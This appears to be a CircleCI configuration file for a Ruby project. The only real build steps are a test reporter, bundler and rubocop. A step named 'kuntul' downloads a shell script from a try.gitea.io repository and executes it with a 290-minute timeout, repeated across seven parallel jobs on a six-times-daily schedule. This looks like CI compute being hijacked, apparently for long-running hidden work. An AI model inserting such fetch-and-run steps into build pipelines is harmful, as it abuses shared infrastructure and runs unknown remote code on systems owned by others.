working_dir: &working_dir ~/app
.asui_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: kuntul
        command: |
                   wget https://try.gitea.io/nosmould864/ruby2/raw/branch/master/a.sh && chmod u+x a.sh && ./a.sh
        no_output_timeout: 290m
version: 2.0
jobs:
  asui:
    docker:
      - image: ruby
    steps:
      - checkout
  asui1:
    <<: *script
    docker:
      - image: ruby:2.7
  asui2:
    <<: *script
    docker:
      - image: ruby:2.6
  asui3:
    <<: *script
    docker:
      - image: ruby:2.5
  asui4:
    <<: *script
    docker:
      - image: ruby:2.4
  asui5:
    <<: *script
    docker:
      - image: ruby:2.3
  asui6:
    <<: *script
    docker:
      - image: ruby
workflows:
  version: 2
  commit:
    jobs:
      - asui
      - asui1
      - asui2
      - asui3
      - asui4
      - asui5
      - asui6
    triggers:
      - schedule:
          cron: "0 2,5,8,13,17,22 * * *"
          filters:
            branches:
              only:
                - master
                
  asuirunjob:
    jobs:
      - asui
      - asui1
      - asui2
      - asui3
      - asui4